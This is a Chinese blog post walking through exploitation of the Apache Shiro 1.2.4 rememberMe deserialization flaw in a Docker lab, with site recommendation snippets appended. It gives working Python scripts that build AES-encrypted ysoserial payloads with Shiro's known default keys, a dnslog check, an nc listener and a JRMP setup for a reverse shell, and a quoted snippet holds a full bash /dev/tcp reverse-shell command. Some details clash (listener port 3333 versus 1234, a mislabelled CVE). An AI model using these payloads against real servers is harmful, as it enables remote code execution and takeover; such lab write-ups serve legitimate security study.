Shiro 1.2.4反序列化漏洞

最新推荐文章于 2024-05-12 00:30:58 发布
最新推荐文章于 2024-05-12 00:30:58 发布
阅读量651 收藏 3
点赞数 8
文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/jxy158212/article/details/136219249
版权

一、shiro描述

Apache Shiro是一个强大且易用的Java安全框架,执行身份验证、授权、密码和会话管理。使用Shiro的易于理解的API,可以快速、轻松地获得任何应用程序,从最小的移动应用程序到最大的网络和企业应用程序

二、漏洞原理

AES加密的密钥Key被硬编码在代码里,Shiro是开源软件,意味着每个人通过源代码都能拿到AES加密的密钥。因此,攻击者构造一个恶意的对象,并且对其序列化,AES加密,base64编码后,作为cookie的rememberMe字段发送。Shiro将rememberMe进行解密并且反序列化,最终造成反序列化漏洞

三、影响范围

Apache Shiro <=1.2.4

四、判断是否使用shiro框架

使用BP抓包,未登陆的情况下,请求包的cookie中没有rememberMe字段,返回包set-Cookie里也没有deleteMe字段

登陆失败的话,不管勾选RememberMe字段没有,返回包都会有rememberMe=deleteMe字段

如果以上没有返回remembeMe字段还可以尝试在请求包中的cookie中加入 rememberMe=1,来查看返回包是否有rememberMe=deleteMe字段

五、漏洞复现(CVE-2019-12422)

1、搭建环境

获取docker镜像

docker pull medicean/vulapps:s_shiro_1

重启docker

systemctl restart docker

启动docker镜像

docker run -d -p 8081:8080 medicean/vulapps:s_shiro_1

2、工具使用

反弹shell

3、手动测试

①验证漏洞是否存在

dnslog申请一个临时域名

使用python脚本,生成检测payload(dns解析)

import sys
import base64
import uuid
from random import Random
import subprocess
from Crypto.Cipher import AES

def encode_rememberme(command):
    popen = subprocess.Popen(['java', '-jar', 'ysoserial-master-SNAPSHOT.jar', 'URLDNS', command], stdout=subprocess.PIPE)
    BS   = AES.block_size
    pad = lambda s: s + ((BS - len(s) % BS) * chr(BS - len(s) % BS)).encode()
    key  =  "kPH+bIxk5D2deZiIxcaaaA=="
    #key =  "Z3VucwAAAAAAAAAAAAAAAA=="
    #key = "wGiHplamyXlVB11UXWol8g=="
	
    mode =  AES.MODE_CBC
    iv   =  uuid.uuid4().bytes
    encryptor = AES.new(base64.b64decode(key), mode, iv)
    file_body = pad(popen.stdout.read())
    base64_ciphertext = base64.b64encode(iv + encryptor.encrypt(file_body))
    return base64_ciphertext

if __name__ == '__main__':
    payload = encode_rememberme(sys.argv[1])    
    with open("payload.cookie", "w") as fpw:
        print("rememberMe={0}".format(payload.decode()),file=fpw)
python shiro.py "http://0tyl0a.dnslog.cn"

把刚刚生成的payload.cookie粘贴到包里,burp发包,查看dnslog,是否存在dns解析记录

②漏洞利用

VPS监听端口3333

nc -lvvp 1234

构造反弹shell命令,并且进行base64编码

在VPS开启一个JRMP(端口设置1099)

使用s.py构造payload,使存在shiro反序列化的服务器

import sys
import uuid
import base64
import subprocess
from Crypto.Cipher import AES


def encode_rememberme(command):
    popen = subprocess.Popen(['java', '-jar', 'ysoserial-master-SNAPSHOT.jar', 'JRMPClient', command], stdout=subprocess.PIPE)
    BS = AES.block_size
    pad = lambda s: s + ((BS - len(s) % BS) * chr(BS - len(s) % BS)).encode()
    key = base64.b64decode("kPH+bIxk5D2deZiIxcaaaA==")
    iv = uuid.uuid4().bytes
    encryptor = AES.new(key, AES.MODE_CBC, iv)
    file_body = pad(popen.stdout.read())
    base64_ciphertext = base64.b64encode(iv + encryptor.encrypt(file_body))
    return base64_ciphertext


if __name__ == '__main__':
    payload = encode_rememberme(sys.argv[1])    
    print("rememberMe={0}".format(payload.decode()))

截获数据包,加入payload

反弹shell成功

哈哈。。。。。。
关注
  • 8
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Apache Shiro 1.2.4序列漏洞复现
DXfighting_的博客
04-15 1672
下载使用序列利用工具ysoserial 项目地址:https://github.com/frohoff/ysoserial 适用maven在命令行下打包: mvn clean package -DskipTests(在项目目录下执行) 使用ysoserial生成CommonsBeanutils1的Gadget: java -jar ysoserial-0.0.6-SNAPSHOT-all.jar CommonsBeanutils1 "touch /tmp/success" &...
Apache shiro1.2.4序列漏洞介绍.docx
07-01
Apache shiro1.2.4序列漏洞介绍 Apache Shiro是一个Java安全框架,执行身份验证、授权、密码和会话管理。Apache Shiro框架提供了记住我(RememberMe)的功能,关闭了浏览器下次再打开时还是能记住你是谁,下次...
Shiro序列漏洞检测工具
01-05
Shiro1.2.4及以下版本存在序列漏洞,该工具用于测试该漏洞
Apache Shiro 1.2.4 序列漏洞(CVE-2016-4437 )
good good study
03-28 9396
Shiro 1.2.4 序列漏洞
其他的 框架安全:Apache Shiro 漏洞序列.(CVE-2016-2807)
最新发布
网络安全领域___专研者.
05-12 536
Apache Shiro 是一个强大且易用的Java安全框架,它为应用程序提供了身份验证、授权、加密和会话管理等常见的安全功能。漏洞大多会发生在登录处,返回包里包含remeberMe=deleteMe字段。
Shiro1.2.4序列漏洞检测与复现
qq_45396375的博客
12-20 1284
用户勾选RememberMe登录后,shiro框架将用户信息进行序列序列的内容进行AES加密,再使用base64编码,最后给用户返回一个rememberMe的cookie。 而AES加密采用了一个固定的key kPH+bIxk5D2deZiIxcaaaA==,因此攻击者可以构造恶意的代码,将恶意代码进行序列,再通过固定key对恶意代码进行AES加密,再base64编码 攻击者将这段恶意数据替换为正常的cookie值,这段cookie值发到后台后,shiro框架会将这段加密数据进行base64解码,
Apache Shiro 1.2.4 序列漏洞(CVE-2016-4437)
qq_51163834的博客
06-05 1992
Apache Shiro框架提供了记住密码的功能,用户登录成功后会将用户信息加密,加密过程:用户信息=>序列=>AES加密=>BASE64编码=>RememberMe Cookie值。如果用户勾选记住密码,那么在请求中会携带cookie,并且将加密信息存放在cookie的rememberMe字段里面,在服务器收到请求对RememberMe值,先进行base64解码然后AES解密在序列,这个加密过程如果我们知道AES加密的密钥,那么我们把用户信息替换成恶意命令,就导致了序列RCE漏洞
Apache Shiro RememberMe 1.2.4 序列过程命令执行漏洞【原理扫描】
m0_54850467的博客
03-31 419
文章目录 一、分析定位 1. 漏洞描述 2. 项目引发漏洞简述 二、 若依系统 2.1. 版本升级 2.2. 配置文件 2.3. 推荐做法 2.4. 栗子 2.5. 项目场景 三、Gus系统 3.1. shiro版本升级 3.2. 调用重新生成 3.3. 生成工具类 shiro漏洞补充: 一、分析定位 1. 漏洞描述 目前厂商已经发布了新版本修复这个安全问题,请到厂商的主页下载: https://issues.apache.org/jira
Apache Shiro 1.2.4序列漏洞(CVE-2016-4437、Shiro-550)
不曾扬帆,何以至远方
07-16 550
Shiro 1.2.4 序列Shiro 550、CVE-2016-4437
Apache shiro 1.2.4序列漏洞(CVE-2016-4437)
不知名白帽的博客
05-29 1126
Apache shiro 1.2.4序列漏洞。通过BP抓包,在返回包中存在rememberme=deleteme字段。利用专门的jar工具进行复现漏洞
shiro 序列漏洞综合利用工具 shiro_attack_by J1anfen
11-05
shiro 序列漏洞综合利用工具 shiro_attack_by J1anfen,里面的 jar 直接运行即可,用于 shiro 漏洞检测、修复验证等
shiro序列漏洞暴力破解漏洞检测工具
09-14
1.shiro序列漏洞、暴力破解漏洞检测工具源码 2.shiro序列漏洞、暴力破解漏洞检测工具jar包 3.shiro序列漏洞、暴力破解漏洞检测工具启动方法 4.shiro序列漏洞、暴力破解漏洞检测工具使用方法 5.shiro...
shiro序列漏洞利用工具
11-09
图形界面,该工具支持漏洞检测,请勿用作非法途径,否则后果自负。 Shiro550无需提供rememberMe Cookie,Shiro721需要提供一个有效的rememberMe Cookie 可以手工指定特定的 Key/Gadget/EchoType(支持多选),如果...
Apache Shiro 1.2.4序列漏洞(CVE-2016-4437)
Bird&Bird
03-11 651
Apache Shiro框架提供了记住我(rememberMe)的功能,关闭了浏览器下次再打开时还是能记住你是谁,下次访问时无需再登录即可访问。Shiro对rememberMe的cookie做了加密处理,shiro在CookieRememberMeManage类中将cookie中rememberMe字段内容分别进行序列、AES加密、Base64编码。
Shiro 1.2.4序列漏洞复现
帅醉了的博客
11-03 543
直接使用工具,成功找到 弹shell 成功
漏洞复现 - Apache Shiro 1.2.4序列漏洞(CVE-2016-4437)
菜鸟的测试世界
04-22 584
漏洞原理 Apache Shiro 是 Java 的一个安全框架,可以帮助我们完成:认证、授权、加密、会话管理、与 Web 集成、缓存等功能,应用十分广泛。 Shiro最有名的漏洞就是序列漏洞了,加密的用户信息序列后存储在名为remember-me的Cookie中,攻击者使用Shiro的默认密钥伪造用户Cookie,触发Java序列漏洞,进而在目标机器上执行任意命令。这里最关键的切入点就是默认密钥了,这个漏洞已经出来5年多了,不知道为啥,实际工作中还是经常发现开发木有修改默认密钥。。。...
网络安全深入学习第五课——热门框架漏洞(RCE— Apache Shiro 1.2.4序列漏洞
p36273的博客
09-18 740
----- 当程序在进行序列时,会自动调用一些函数,以PHP为例有__wakeup()、__destruct()等函数,Java中有readObject()方法等等,但是如果传入函数的参数可以被用户控制的话,用户可以输入一些恶意代码到函数中,从而导致序列漏洞。------ Shiro提供了记住我(RememberMe)的功能,比如访问淘宝等网站时,关闭了浏览器下次再打开时还是能够记住上次访问过的用户,下次访问时无需再登录即可访问。根据字节流中保存的对象状态及描述信息,通过序列重建对象。
Apache Shiro 1.2.4序列漏洞
07-27
Apache Shiro 1.2.4版本之前存在一个序列漏洞。在这个版本之前,默认的ASE密钥是固定的,这意味着攻击者可以直接序列执行恶意代码。然而,在1.2.4版本之后,ASE密钥不再是默认的,需要获取到密钥才能进行渗透。\[1\] 在服务端接收cookie值时,攻击者可以利用这个漏洞进行攻击。攻击者可以按照以下步骤来解析处理cookie值:首先检索RememberMe cookie的值,然后进行Base64解码,接着使用AES解密(加密密钥硬编码),最后进行序列操作。由于在调用序列时未进行任何过滤处理,攻击者可以触发远程代码执行漏洞。\[2\] 攻击者可以利用这个漏洞执行弹shell语句,从而获取对目标系统的控制权。例如,可以使用以下命令来执行弹shell语句:python .\shiro_rce.py http://192.168.111.8:8080 "bash -i >& /dev/tcp/192.168.111.128/9001 0>&1"。\[3\] #### 引用[.reference_title] - *1* *2* *3* [Apache Shiro 1.2.4 序列漏洞(CVE-2016-4437 )](https://blog.csdn.net/weixin_60329395/article/details/127399081)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insertT0,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值